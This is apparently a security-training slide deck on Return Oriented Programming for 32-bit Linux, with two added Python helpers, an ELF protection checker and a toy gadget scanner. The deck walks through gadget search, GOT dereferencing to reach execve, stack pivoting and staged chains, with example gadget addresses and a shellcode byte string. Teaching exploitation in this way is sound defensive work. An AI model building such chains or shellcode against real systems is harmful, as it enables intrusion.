08 - Return Oriented Programming, the chosen one


  1. Return Oriented Programming: The chosen one
     Alex Moneger, Security Engineer
  2. Introduction
      ROP = Return Oriented Programming
      Uses the “ret” instruction to drive the execution flow
      Allows to bypass ASLR and DEP
      Relies on the fact that .text section is at a fixed address
      Used in all modern exploits
     © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
  3. Refresher
      Ret2libc uses function addresses at known locations
      Never executes code on the stack
      Problem: ASLR randomizes the addresses
      Any other fixed address candidates?
  4. General concepts
  5. Non-randomized addresses
      Check the randomization again:
        cisco@kali:~/src/seccon/ch8$ ./aslr
        Stack base address: 0xbfcb9a74
        Heap base address: 0x8cbd008
        Memcpy libc address: 0xb76ad9a0
        Code section address: 0x804857e
        Data section address: 0x80498d0
        RO data section address: 0x8048670
        cisco@kali:~/src/seccon/ch8$ ./aslr
        Stack base address: 0xbfd14d04
        Heap base address: 0x85d7008
        Memcpy libc address: 0xb76ce9a0
        Code section address: 0x804857e
        Data section address: 0x80498d0
        RO data section address: 0x8048670
      With ASLR enabled, .text is not randomized
  6. Impact
      .text section is not randomized
      .data section is not randomized
      PLT is a fixed offset from .text
      GOT is at fixed address, because in the same segment as .text
      Can we re-use any of this?
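A way to check the property slides 5 and 6 rely on for any given binary, as an added defender's check that is not part of the deck: parse the ELF program headers and report whether the image is position-independent (ET_DYN, so .text and the GOT move with ASLR instead of sitting at a fixed address), whether PT_GNU_STACK marks the stack non-executable, and whether a PT_GNU_RELRO segment exists. The ELF constants are standard; the sample image is constructed here for the test.

```python
import struct
import sys

PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X = 1
ET_EXEC, ET_DYN = 2, 3

def elf_protections(data: bytes) -> dict:
    """Read the ELF header and program headers of an image held in memory."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2                 # EI_CLASS: 1 = ELF32, 2 = ELF64
    e = "<" if data[5] == 1 else ">"    # EI_DATA: 1 = little-endian
    e_type, = struct.unpack_from(e + "H", data, 16)
    if is64:
        e_phoff, = struct.unpack_from(e + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 54)
        ph_fmt = e + "IIQQQQQQ"   # p_type p_flags p_offset p_vaddr p_paddr p_filesz p_memsz p_align
    else:
        e_phoff, = struct.unpack_from(e + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 42)
        ph_fmt = e + "IIIIIIII"   # p_type p_offset p_vaddr p_paddr p_filesz p_memsz p_flags p_align
    # No PT_GNU_STACK at all means the kernel grants an executable stack on x86.
    res = {"pie": e_type == ET_DYN, "nx": False, "relro": False, "text_vaddr": None}
    for i in range(e_phnum):
        f = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        p_type, p_flags, p_vaddr = (f[0], f[1], f[3]) if is64 else (f[0], f[6], f[2])
        if p_type == PT_GNU_STACK:
            res["nx"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            res["relro"] = True
        elif p_type == PT_LOAD and (p_flags & PF_X) and res["text_vaddr"] is None:
            res["text_vaddr"] = p_vaddr     # first executable segment: where .text lives
    res["fixed_text"] = not res["pie"]      # the property the deck's gadget addresses depend on
    return res

def build_sample_elf32(e_type: int, stack_flags=None) -> bytes:
    """Constructed minimal ELF32 (header + program headers only), for testing."""
    phdrs = [(PT_LOAD, 0, 0x08048000, 0x08048000, 0x1000, 0x1000, 5, 0x1000)]
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16))
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)   # ELF32, little-endian, version 1
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x08048000, 52, 0, 0,
                               52, 32, len(phdrs), 40, 0, 0)
    return ehdr + b"".join(struct.pack("<IIIIIIII", *p) for p in phdrs)

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fh:          # e.g. the deck's ch8 binary
        print(elf_protections(fh.read()))
```

A non-PIE image reports fixed_text True, which is the precondition for reusing hard-coded .text, PLT and GOT addresses; building with PIE removes it, and NX plus RELRO close the other two doors the following slides walk through.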
  7. .text
      What can we do in .text?
      .text is the code section, so contains instructions
      How can we re-use those instructions?
      Remember pop;pop;ret construct from ret2libc?
      We can re-use any instructions with a trailing “ret”
      This lets us keep control of the execution stack
  8. BoF is control of eip, ROP is control of esp
  9. Visual flow
      I want to add 2 values together
      Then put that value at a memory address
      i.e.: 4 (eax) + 3 (ebx) = 7 (eax); 0x1234 (mem) = 7 (eax)
     Stack contents, lowest address first (each gadget’s ret pops the next entry):
        &pop;pop;ret
        4
        3
        &add reg reg; ret
        &pop;ret
        0x1234
        &mov mem reg; ret
     Gadgets used: pop reg; pop reg; ret / add; ret / pop reg; ret / mov; ret
  10. Steps
     1. Know what you want to achieve (hardest)
     2. Have a vague low-level idea of how to do it
     3. Find gadgets
     4. Find a way to stitch them together
     5. Debug
     6. Exploit
  11. Finding instructions
      Find all “ret”s in a program (“\xc3”)
      Disassemble backwards (pick a reasonable number of instructions)
      Each such set of instructions is referred to as a “gadget”
      That gives you a set you can play with
  12. Finding instructions
     1. Use objdump
         Suboptimal, requires the ret instruction to be semantically correct (objdump only shows rets at instruction boundaries)
     2. Search for the “\xc3” opcode manually and disassemble back from there
         Lot of manual work
     3. Use a proper tool
         We’ll use a tool, for once ;)
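Why the objdump approach misses gadgets and what a tool does instead, as an added toy in Python that is not Ropeme or any of the deck's tools: scan the code bytes for 0xc3, walk backwards over a handful of single-byte opcodes (pop reg, leave, nop; a real tool uses a full disassembler), and offer a Ropeme-style % wildcard search. The code bytes and base address are constructed for the example; the mov eax, imm32 whose immediate contains 5b 58 c3 is the unaligned gadget a linear disassembly never lists.

```python
import fnmatch

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# The only x86 opcodes this toy decoder knows: pop r32 (0x58+r), leave, nop.
# Real tools decode every instruction length; this is enough to show the idea.
ONE_BYTE = {0x58 + i: f"pop {r}" for i, r in enumerate(REGS)}
ONE_BYTE.update({0xC9: "leave", 0x90: "nop"})
RET = 0xC3

def find_gadgets(code: bytes, base: int, depth: int = 4) -> dict:
    """Return {address: gadget text} for every decodable run that ends in ret.

    Every 0xc3 byte is a candidate, including one sitting inside the immediate
    of a longer instruction, which is exactly what objdump's linear sweep misses.
    """
    gadgets = {}
    for ret_off, byte in enumerate(code):
        if byte != RET:
            continue
        insns, off = [], ret_off
        while off > 0 and len(insns) < depth and code[off - 1] in ONE_BYTE:
            off -= 1
            insns.insert(0, ONE_BYTE[code[off]])
            gadgets[base + off] = " ; ".join(insns + ["ret"])   # one entry per start address
    return gadgets

def search(gadgets: dict, pattern: str, exclude=()) -> list:
    """Ropeme-style query: '%' is a wildcard, exclude drops gadgets containing a mnemonic."""
    glob = pattern.replace("%", "*") + "*"
    return sorted((addr, text) for addr, text in gadgets.items()
                  if fnmatch.fnmatchcase(text, glob)
                  and not any(x in text for x in exclude))

# Constructed sample bytes at a hypothetical base address: a function epilogue, then
# mov eax, 0x00c3585b whose immediate hides "pop ebx ; pop eax ; ret", then leave ; ret.
SAMPLE = bytes([0x55, 0x89, 0xE5,              # push ebp ; mov ebp, esp
                0x5E, 0x5F, 0x5D, 0xC3,        # pop esi ; pop edi ; pop ebp ; ret
                0xB8, 0x5B, 0x58, 0xC3, 0x00,  # mov eax, 0x00c3585b
                0xC9, 0xC3])                   # leave ; ret
BASE = 0x08048400

if __name__ == "__main__":
    found = find_gadgets(SAMPLE, BASE)
    for addr, text in search(found, "pop %", exclude=("leave",)):
        print(f"0x{addr:x}: {text}")
```

objdump would list the 5-byte mov as a single instruction; the scan reports a gadget starting one byte into it, which is why gadget counts stay high even in code that was never written to contain them.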
  13. Ropeme
      Ropeme disassembles backwards a number of instructions
      Allows you to search for gadgets using wildcards:
        cisco@kali:~/src/seccon/ch8$ ropshell.py
        Simple ROP interactive shell: [generate, load, search] gadgets
        ROPeMe> generate ch6 4
        Generating gadgets for ch6 with backward depth=4
        It may take few minutes depends on the depth and file size...
        Processing code block 1/1
        Generated 93 gadgets
        Dumping asm gadgets to file: ch6.ggt ... OK
        ROPeMe> search add eax %
        Searching for ROP gadget: add eax % with constraints: []
        0x80482fcL: add eax 0x3ee8 ; add [eax+0x5b] bl ; leave ;;
        0x80485f8L: add eax 0x83038745 ; add al 0x6e ;;
        ROPeMe> search pop % -leave
        Searching for ROP gadget: pop % with constraints: ['-leave']
        0x8048528L: pop ebp ;;
        0x8048495L: pop ebx ; pop edi ; pop ebp ;;
  14. Useful gadgets
      pop reg => put a value in reg
      add [reg1] reg2 => add reg2 to memory address in reg1
      mov [reg1] reg2 => mov reg2 into memory address in reg1
      call reg => call the address in reg
      jmp reg => jump to address
  15. Put gadgets together
      Create high level gadgets, by putting low level gadgets together:
        # Write value in eax to memory
        0x8048502L: pop ebx ; pop ebp ;;
        0x80484feL: add [ebx+0x5d5b04c4] eax ;;
        # Load memory value into eax
        0x8048502L: pop ebx ; pop ebp ;;
        0x804875eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;;
        # Load eax with a value
        0x804dad5L: mov eax edi ; pop ebx ; pop esi ; pop edi ; pop ebp ;;
      It’s up to you to find meaningful gadgets to use
      Use those high level gadgets to build payloads
  16. ROP flow
  17. Stages
      ROP exploit generally has multiple stages
     1. Stage 0:
         Stabilize exploit
         Take control of eip
         Copy payload into fake frame
         Dereference GOT
     2. Stack pivot from stage 0 to stage 1
  18. Stage 1
     3. Stage 1:
         Change memory permissions (optional)
         Execute payload
         Cleanup (optional)
  19. Getting function addresses
  20. GOT dereferencing
      Remember the GOT?
      Grab an arbitrary address from it
      Add the libc offset with the function you want
      Call it
      Or write it to mem, and call it later
  21. Example
      Example: find execve based on strcpy (0xb7ed8b70)
      &strcpy GOT = 0x08049fec
      &execve – &strcpy = 0x27b10
        # Get the GOT address of strcpy (0x08049fec) into ebx
        0x8052b9dL: pop ebx ; lea eax [edx+eax*8] ;;
        # Move the content of GOT entry (&strcpy) into edx
        0x8052b98L: mov edx [ebx] ; pop ebx ; lea eax [edx+eax*8] ;;
        # Move delta between functions 0x27b10 into ecx
        0x8060883L: pop ecx ;;
        # Add &strcpy with offset = &execve!
        0x8061ddaL: add edx ecx;;
     Stack contents, lowest address first:
        0x8052b9d    (pop ebx ; lea ...)
        0x08049fec   (popped into ebx)
        0x8052b98    (mov edx [ebx] ; pop ebx ; lea ...)
        0x41414141   (filler for pop ebx)
        0x8060883    (pop ecx)
        0x27b10      (popped into ecx)
        0x8061dda    (add edx ecx)
  22. Calling the function
      Calling the dereferenced function (value in edx)
        # Call register
        0x804c244L: call edx ; leave ;;
      Writing the dereferenced function somewhere (i.e.: 0x12345678)
        # Move address value (0x12345678) into eax
        0x8058ae0L: pop eax ; pop ebx ;;
        # Move edx to that address
        0x8056579L: mov [eax] edx ;;
  23. Copying payload
  24. Stage 0
      2 options:
         Build shellcode from pieces of memory
         Do multiple GOT dereferencing
      Both end up the same:
         Build fake stack frame to transfer control to
  25. Copying shellcode
      Find individual shellcode bytes in memory
      Use a copy function (i.e.: strcpy) to copy bytes from memory to fake stack frame
      Ropc can give you the memory addresses of shellcode bytes
        cisco@kali:~/src/seccon/ch8$ ropc -s "x6ax0bx58x99x52x66x68x2dx70x89xe1x52x6ax68x68x2fx62x61x73x68x2fx62x69x6ex89xe3x52x51x53x89xe1xc dx80" -f ch8
        0x00000000 -> "x6a" (NOT FOUND)
        0x080485b4 -> "x0b"
        0x080480f8 -> "x58"
        0x08048378 -> "x99"
        0x0804836a -> "x52"
  26. Building payload
      Identify fake stack
      Find address of functions you’re interested in
      Copy function addresses to fake stack
      Copy arguments to fake stack
      Stack pivot to new stack
  27. Stack pivoting
  28. Stack pivoting
      Build a fake stack in memory with your payload
      Move to it to start execution of payload
      Called stack pivoting, because you lead the execution flow to your own stack
  29. How to do it?
      You need a way to control the stack pointer
      Esp needs to be controlled, and redirected
      Useful gadgets:
        # eax contains the value of your new frame
        0x8055c61L: xchg esp eax ;;
        # leave = mov esp, ebp; pop ebp; control ebp = control esp
        0x8049844L: leave ;;
  30. What it looks like
      Stage 0 “copying” stack (esp = 0x08048a00), lowest address first:
        Copy data
        Copy data
        Copy data
        Copy data
        Copy data
        0x12345678 – 0x4   (value for ebp)
        leave; ret
      Stage 1 “payload” stack (esp = 0x12345678), lowest address first:
        0x8052b9d
        0x08049fec
        0x8052b98
        0x41414141
        0x8060883
        0x27b10
        0x8061dda
  31. That’s it!
  32. Exercise time!
      Find what protections are active on ch8
      No source, but I left symbols ;)
      Reverse it
      Find the vulnerability
      Exploit it
      You probably won’t finish this today, but keep chewing on it ;)
